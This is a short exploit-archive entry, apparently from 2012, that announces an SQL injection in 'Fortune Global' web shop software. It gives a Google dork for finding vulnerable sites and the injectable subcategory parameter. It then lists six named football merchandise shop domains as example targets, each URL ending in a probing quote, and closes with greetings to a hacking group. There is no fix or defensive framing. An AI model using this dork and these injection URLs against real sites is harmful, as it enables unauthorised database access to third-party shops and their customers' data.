Fortune Global SQL injection



EKU-ID: 1941 CVE: OSVDB-ID:
Author: CWpisagor Published: 2012-04-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################################
# Exploit Title:  Fortune Global SQL injection
# Date: 17-04-2012
# Author: CWpisagor
# Category:: Webapps
# Google dork: "© 2007 Fortune Global Ltd." inurl:index.php?subcategory="
# Tested on: Windows 7
##################################################################


www.server.com/path/index.php?subcategory=[SQL]


Example Site


http://www.fortuneglobal.co.uk/badfc/index.php?subcategory=240'

http://chelseaclubshop.co.uk/index.php?subcategory=600'

http://www.lfcshop.com/index.php?subcategory=399'

http://www.manchesterunitedshirt.com/index.php?subcategory=803'

http://www.westhamshirt.com/index.php?subcategory=604'

http://www.arsenalfcshop.com/index.php?subcategory=600'


Thanx : Volqan , CWKaraKule , Beyaz_Sancak , Servan , Hizmetkar , Mad_Boy and Cyber-Warrior All Users